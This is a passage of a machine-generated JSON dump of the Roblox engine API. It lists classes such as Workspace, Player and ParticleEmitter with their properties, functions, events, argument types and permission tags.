ags":[],"Class":"VehicleSeat"},{"ValueType":"bool","type":"Property","Name":"HeadsUpDisplay","tags":[],"Class":"VehicleSeat"},{"ValueType":"float","type":"Property","Name":"MaxSpeed","tags":[],"Class":"VehicleSeat"},{"ValueType":"Object","type":"Property","Name":"Occupant","tags":["readonly"],"Class":"VehicleSeat"},{"ValueType":"int","type":"Property","Name":"Steer","tags":[],"Class":"VehicleSeat"},{"ValueType":"int","type":"Property","Name":"Throttle","tags":[],"Class":"VehicleSeat"},{"ValueType":"float","type":"Property","Name":"Torque","tags":[],"Class":"VehicleSeat"},{"ValueType":"float","type":"Property","Name":"TurnSpeed","tags":[],"Class":"VehicleSeat"},{"Superclass":"PVInstance","type":"Class","Name":"Model","tags":[]},{"ValueType":"Object","type":"Property","Name":"PrimaryPart","tags":[],"Class":"Model"},{"ReturnType":"void","Arguments":[],"Name":"BreakJoints","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetExtentsSize","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"CoordinateFrame","Arguments":[],"Name":"GetModelCFrame","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetModelSize","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"CoordinateFrame","Arguments":[],"Name":"GetPrimaryPartCFrame","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"MakeJoints","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"position","Default":null}],"Name":"MoveTo","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ResetOrientationToIdentity","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SetIdentityOrientation","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"CoordinateFrame","Name":"cframe","Default":null}],"Name":"SetPrimaryPartCFrame","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"delta","Default":null}],"Name":"TranslateBy","tags":[],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"breakJoints","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"makeJoints","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"location","Default":null}],"Name":"move","tags":["deprecated"],"Class":"Model","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"location","Default":null}],"Name":"moveTo","tags":["deprecated"],"Class":"Model","type":"Function"},{"Superclass":"Model","type":"Class","Name":"RootInstance","tags":["notbrowsable"]},{"Superclass":"RootInstance","type":"Class","Name":"Workspace","tags":[]},{"ValueType":"bool","type":"Property","Name":"AllowThirdPartySales","tags":[],"Class":"Workspace"},{"ValueType":"Object","type":"Property","Name":"CurrentCamera","tags":[],"Class":"Workspace"},{"ValueType":"double","type":"Property","Name":"DistributedGameTime","tags":[],"Class":"Workspace"},{"ValueType":"bool","type":"Property","Name":"FilteringEnabled","tags":[],"Class":"Workspace"},{"ValueType":"float","type":"Property","Name":"Gravity","tags":[],"Class":"Workspace"},{"ValueType":"bool","type":"Property","Name":"StreamingEnabled","tags":[],"Class":"Workspace"},{"ValueType":"Object","type":"Property","Name":"Terrain","tags":["readonly"],"Class":"Workspace"},{"ReturnType":"void","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"BreakJoints","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"ExperimentalSolverIsEnabled","tags":["LocalUserSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Ray","Name":"ray","Default":null},{"Type":"Instance","Name":"ignoreDescendentsInstance","Default":"nil"},{"Type":"bool","Name":"terrainCellsAreCubes","Default":"false"},{"Type":"bool","Name":"ignoreWater","Default":"false"}],"Name":"FindPartOnRay","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Ray","Name":"ray","Default":null},{"Type":"Objects","Name":"ignoreDescendentsTable","Default":null},{"Type":"bool","Name":"terrainCellsAreCubes","Default":"false"},{"Type":"bool","Name":"ignoreWater","Default":"false"}],"Name":"FindPartOnRayWithIgnoreList","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"Instance","Name":"ignoreDescendentsInstance","Default":"nil"},{"Type":"int","Name":"maxParts","Default":"20"}],"Name":"FindPartsInRegion3","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"Objects","Name":"ignoreDescendentsTable","Default":null},{"Type":"int","Name":"maxParts","Default":"20"}],"Name":"FindPartsInRegion3WithIgnoreList","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"GetNumAwakeParts","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"GetPhysicsAnalyzerBreakOnIssue","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"int","Name":"index","Default":null}],"Name":"GetPhysicsAnalyzerIssue","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"GetPhysicsThrottling","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"double","Arguments":[],"Name":"GetRealPhysicsFPS","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"Instance","Name":"ignoreDescendentsInstance","Default":"nil"}],"Name":"IsRegion3Empty","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"Objects","Name":"ignoreDescendentsTable","Default":null}],"Name":"IsRegion3EmptyWithIgnoreList","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Objects","Name":"objects","Default":null},{"Type":"JointCreationMode","Name":"jointType","Default":null}],"Name":"JoinToOutsiders","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"MakeJoints","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"PGSIsEnabled","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enable","Default":null}],"Name":"SetPhysicsAnalyzerBreakOnIssue","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetPhysicsThrottleEnabled","tags":["LocalUserSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Objects","Name":"objects","Default":null}],"Name":"UnjoinFromOutsiders","tags":[],"Class":"Workspace","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ZoomToExtents","tags":["PluginSecurity"],"Class":"Workspace","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Ray","Name":"ray","Default":null},{"Type":"Instance","Name":"ignoreDescendentsInstance","Default":"nil"},{"Type":"bool","Name":"terrainCellsAreCubes","Default":"false"},{"Type":"bool","Name":"ignoreWater","Default":"false"}],"Name":"findPartOnRay","tags":["deprecated"],"Class":"Workspace","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"Instance","Name":"ignoreDescendentsInstance","Default":"nil"},{"Type":"int","Name":"maxParts","Default":"20"}],"Name":"findPartsInRegion3","tags":["deprecated"],"Class":"Workspace","type":"Function"},{"Arguments":[{"Name":"count","Type":"int"}],"Name":"PhysicsAnalyzerIssuesFound","tags":["PluginSecurity"],"Class":"Workspace","type":"Event"},{"Superclass":"Model","type":"Class","Name":"Status","tags":["deprecated","notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"Pages","tags":[]},{"ValueType":"bool","type":"Property","Name":"IsFinished","tags":["readonly"],"Class":"Pages"},{"ReturnType":"Array","Arguments":[],"Name":"GetCurrentPage","tags":[],"Class":"Pages","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"AdvanceToNextPageAsync","tags":[],"Class":"Pages","type":"YieldFunction"},{"Superclass":"Pages","type":"Class","Name":"DataStorePages","tags":[]},{"Superclass":"Pages","type":"Class","Name":"FriendPages","tags":[]},{"Superclass":"Pages","type":"Class","Name":"StandardPages","tags":[]},{"Superclass":"Instance","type":"Class","Name":"PartOperationAsset","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ParticleEmitter","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Acceleration","tags":[],"Class":"ParticleEmitter"},{"ValueType":"ColorSequence","type":"Property","Name":"Color","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"Drag","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NormalId","type":"Property","Name":"EmissionDirection","tags":[],"Class":"ParticleEmitter"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberRange","type":"Property","Name":"Lifetime","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"LightEmission","tags":[],"Class":"ParticleEmitter"},{"ValueType":"bool","type":"Property","Name":"LockedToPart","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"Rate","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberRange","type":"Property","Name":"RotSpeed","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberRange","type":"Property","Name":"Rotation","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberSequence","type":"Property","Name":"Size","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberRange","type":"Property","Name":"Speed","tags":[],"Class":"ParticleEmitter"},{"ValueType":"Content","type":"Property","Name":"Texture","tags":[],"Class":"ParticleEmitter"},{"ValueType":"NumberSequence","type":"Property","Name":"Transparency","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"VelocityInheritance","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"VelocitySpread","tags":[],"Class":"ParticleEmitter"},{"ValueType":"float","type":"Property","Name":"ZOffset","tags":[],"Class":"ParticleEmitter"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"particleCount","Default":"16"}],"Name":"Emit","tags":[],"Class":"ParticleEmitter","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Path","tags":[]},{"ValueType":"PathStatus","type":"Property","Name":"Status","tags":["readonly"],"Class":"Path"},{"ReturnType":"Array","Arguments":[],"Name":"GetPointCoordinates","tags":[],"Class":"Path","type":"Function"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"start","Default":null}],"Name":"CheckOcclusionAsync","tags":[],"Class":"Path","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"PathfindingService","tags":["notCreatable"]},{"ValueType":"float","type":"Property","Name":"EmptyCutoff","tags":[],"Class":"PathfindingService"},{"ReturnType":"Instance","Arguments":[{"Type":"Vector3","Name":"start","Default":null},{"Type":"Vector3","Name":"finish","Default":null},{"Type":"float","Name":"maxDistance","Default":null}],"Name":"ComputeRawPathAsync","tags":[],"Class":"PathfindingService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"Vector3","Name":"start","Default":null},{"Type":"Vector3","Name":"finish","Default":null},{"Type":"float","Name":"maxDistance","Default":null}],"Name":"ComputeSmoothPathAsync","tags":[],"Class":"PathfindingService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"PersonalServerService","tags":[]},{"ValueType":"string","type":"Property","Name":"RoleSets","tags":["RobloxScriptSecurity"],"Class":"PersonalServerService"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null}],"Name":"Demote","tags":["RobloxScriptSecurity"],"Class":"PersonalServerService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null}],"Name":"Promote","tags":["RobloxScriptSecurity"],"Class":"PersonalServerService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"personalServerGetRankUrl","Default":null}],"Name":"SetPersonalServerGetRankUrl","tags":["LocalUserSecurity"],"Class":"PersonalServerService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"personalServerRoleSetsUrl","Default":null}],"Name":"SetPersonalServerRoleSetsUrl","tags":["LocalUserSecurity"],"Class":"PersonalServerService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"personalServerSetRankUrl","Default":null}],"Name":"SetPersonalServerSetRankUrl","tags":["LocalUserSecurity"],"Class":"PersonalServerService","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"placeId","Default":null}],"Name":"GetRoleSets","tags":["RobloxScriptSecurity"],"Class":"PersonalServerService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"PhysicsPacketCache","tags":[]},{"Superclass":"Instance","type":"Class","Name":"PhysicsService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"PhysicsSettings","tags":[]},{"ValueType":"bool","type":"Property","Name":"AllowSleep","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreAnchorsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreAssembliesShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreAttachmentsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreAwakePartsHighlighted","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreBodyTypesShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreConstraintsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreContactPointsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreJointCoordinatesShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreMechanismsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreModelCoordsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreOwnersShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"ArePartCoordsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreRegionsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreUnalignedPartsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"AreWorldCoordsShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"IsReceiveAgeShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"IsTreeShown","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"ParallelPhysics","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"PhysicsAnalyzerEnabled","tags":["PluginSecurity","readonly"],"Class":"PhysicsSettings"},{"ValueType":"EnviromentalPhysicsThrottle","type":"Property","Name":"PhysicsEnvironmentalThrottle","tags":[],"Class":"PhysicsSettings"},{"ValueType":"bool","type":"Property","Name":"ShowDecompositionGeometry","tags":[],"Class":"PhysicsSettings"},{"ValueType":"double","type":"Property","Name":"ThrottleAdjustTime","tags":[],"Class":"PhysicsSettings"},{"Superclass":"Instance","type":"Class","Name":"Player","tags":[]},{"ValueType":"int","type":"Property","Name":"AccountAge","tags":["readonly"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"AppearanceDidLoad","tags":["RobloxScriptSecurity","deprecated","readonly"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"AutoJumpEnabled","tags":[],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"CameraMaxZoomDistance","tags":[],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"CameraMinZoomDistance","tags":[],"Class":"Player"},{"ValueType":"CameraMode","type":"Property","Name":"CameraMode","tags":[],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"CanLoadCharacterAppearance","tags":[],"Class":"Player"},{"ValueType":"Object","type":"Property","Name":"Character","tags":[],"Class":"Player"},{"ValueType":"string","type":"Property","Name":"CharacterAppearance","tags":["notbrowsable"],"Class":"Player"},{"ValueType":"ChatMode","type":"Property","Name":"ChatMode","tags":["RobloxScriptSecurity","readonly"],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"DataComplexity","tags":["readonly"],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"DataComplexityLimit","tags":["LocalUserSecurity"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"DataReady","tags":["readonly"],"Class":"Player"},{"ValueType":"DevCameraOcclusionMode","type":"Property","Name":"DevCameraOcclusionMode","tags":[],"Class":"Player"},{"ValueType":"DevComputerCameraMovementMode","type":"Property","Name":"DevComputerCameraMode","tags":[],"Class":"Player"},{"ValueType":"DevComputerMovementMode","type":"Property","Name":"DevComputerMovementMode","tags":[],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"DevEnableMouseLock","tags":[],"Class":"Player"},{"ValueType":"DevTouchCameraMovementMode","type":"Property","Name":"DevTouchCameraMode","tags":[],"Class":"Player"},{"ValueType":"DevTouchMovementMode","type":"Property","Name":"DevTouchMovementMode","tags":[],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"FollowUserId","tags":["readonly"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"Guest","tags":["RobloxScriptSecurity","readonly"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"HasBuildTools","tags":["RobloxScriptSecurity"],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"HealthDisplayDistance","tags":[],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"MaximumSimulationRadius","tags":["LocalUserSecurity"],"Class":"Player"},{"ValueType":"MembershipType","type":"Property","Name":"MembershipType","tags":["readonly"],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"NameDisplayDistance","tags":[],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"Neutral","tags":[],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"PersonalServerRank","tags":["RobloxScriptSecurity"],"Class":"Player"},{"ValueType":"Object","type":"Property","Name":"RespawnLocation","tags":[],"Class":"Player"},{"ValueType":"float","type":"Property","Name":"SimulationRadius","tags":["LocalUserSecurity"],"Class":"Player"},{"ValueType":"BrickColor","type":"Property","Name":"TeamColor","tags":[],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"Teleported","tags":["RobloxScriptSecurity","hidden","readonly"],"Class":"Player"},{"ValueType":"bool","type":"Property","Name":"TeleportedIn","tags":["RobloxScriptSecurity"],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"UserId","tags":[],"Class":"Player"},{"ValueType":"string","type":"Property","Name":"VRDevice","tags":["RobloxScriptSecurity"],"Class":"Player"},{"ValueType":"int","type":"Property","Name":"userId","tags":["deprecated"],"Class":"Player"},{"ReturnType":"void","Arguments":[],"Name":"ClearCharacterAppearance","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"float","Arguments":[{"Type":"Vector3","Name":"point","Default":null}],"Name":"DistanceFromCharacter","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"FriendStatus","Arguments":[{"Type":"Instance","Name":"player","Default":null}],"Name":"GetFriendStatus","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetGameSessionID","tags":["RobloxSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetMouse","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"GetUnder13","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"HasAppearanceLoaded","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"JumpCharacter","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Kick","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"LoadBoolean","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"inGame","Default":"true"}],"Name":"LoadCharacter","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"assetInstance","Default":null}],"Name":"LoadCharacterAppearance","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"LoadData","tags":["LocalUserSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"LoadInstance","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"double","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"LoadNumber","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"LoadString","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"walkDirection","Default":null},{"Type":"bool","Name":"relativeToCamera","Default":"false"}],"Name":"Move","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"walkDirection","Default":null},{"Type":"float","Name":"maxWalkDelta","Default":null}],"Name":"MoveCharacter","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RemoveCharacter","tags":["LocalUserSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null}],"Name":"RequestFriendship","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null}],"Name":"RevokeFriendship","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"bool","Name":"value","Default":null}],"Name":"SaveBoolean","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SaveData","tags":["LocalUserSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Instance","Name":"value","Default":null}],"Name":"SaveInstance","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SaveLeaderboardData","tags":["LocalUserSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"double","Name":"value","Default":null}],"Name":"SaveNumber","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"string","Name":"value","Default":null}],"Name":"SaveString","tags":[],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"accountAge","Default":null}],"Name":"SetAccountAge","tags":["PluginSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"MembershipType","Name":"membershipType","Default":null}],"Name":"SetMembershipType","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetSuperSafeChat","tags":["PluginSecurity"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetUnder13","tags":["RobloxSecurity","deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"loadBoolean","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"loadInstance","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"double","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"loadNumber","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"loadString","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"bool","Name":"value","Default":null}],"Name":"saveBoolean","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Instance","Name":"value","Default":null}],"Name":"saveInstance","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"double","Name":"value","Default":null}],"Name":"saveNumber","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"string","Name":"value","Default":null}],"Name":"saveString","tags":["deprecated"],"Class":"Player","type":"Function"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"maxFriends","Default":"200"}],"Name":"GetFriendsOnline","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"GetRankInGroup","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"GetRoleInGroup","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"string","Arguments":[],"Name":"GetWebPersonalServerRank","tags":["LocalUserSecurity","backend"],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"IsBestFriendsWith","tags":["deprecated"],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"IsFriendsWith","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"IsInGroup","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"rank","Default":null}],"Name":"SetWebPersonalServerRank","tags":["WritePlayerSecurity"],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[],"Name":"WaitForDataReady","tags":[],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"isFriendsWith","tags":["deprecated"],"Class":"Player","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[],"Name":"waitForDataReady","tags":["deprecated"],"Class":"Player","type":"YieldFunction"},{"Arguments":[{"Name":"character","Type":"Instance"}],"Name":"CharacterAdded","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"character","Type":"Instance"}],"Name":"CharacterAppearanceLoaded","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"character","Type":"Instance"}],"Name":"CharacterRemoving","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"message","Type":"string"},{"Name":"recipient","Type":"Instance"}],"Name":"Chatted","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"friendStatus","Type":"FriendStatus"}],"Name":"FriendStatusChanged","tags":["RobloxScriptSecurity"],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"time","Type":"double"}],"Name":"Idled","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"teleportState","Type":"TeleportState"},{"Name":"placeId","Type":"int"},{"Name":"spawnName","Type":"string"}],"Name":"OnTeleport","tags":[],"Class":"Player","type":"Event"},{"Arguments":[{"Name":"radius","Type":"float"}],"Name":"SimulationRadiusChanged","tags":["LocalUserSecurity"],"Class":"Player","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"PlayerScripts","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"Players","tags":[]},{"ValueType":"bool","type":"Property","Name":"BubbleChat","tags":["readonly"],"Class":"Players"},{"ValueType":"bool","type":"Property","Name":"CharacterAutoLoads","tags":[],"Class":"Players"},{"ValueType":"bool","type":"Property","Name":"ClassicChat","tags":["readonly"],"Class":"Players"},{"ValueType":"Object","type":"Property","Name":"LocalPlayer","tags":["readonly"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"MaxPlayers","tags":["readonly"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"MaxPlayersInternal","tags":["LocalUserSecurity"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"NumPlayers","tags":["readonly"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"PreferredPlayers","tags":["readonly"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"PreferredPlayersInternal","tags":["LocalUserSecurity"],"Class":"Players"},{"ValueType":"Object","type":"Property","Name":"localPlayer","tags":["deprecated","hidden","readonly"],"Class":"Players"},{"ValueType":"int","type":"Property","Name":"numPlayers","tags":["deprecated","hidden","readonly"],"Class":"Players"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"AddLeaderboardKey","tags":["LocalUserSecurity"],"Class":"Players","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":null}],"Name":"Chat","tags":["PluginSecurity"],"Class":"Players","type":"Function"},{"ReturnT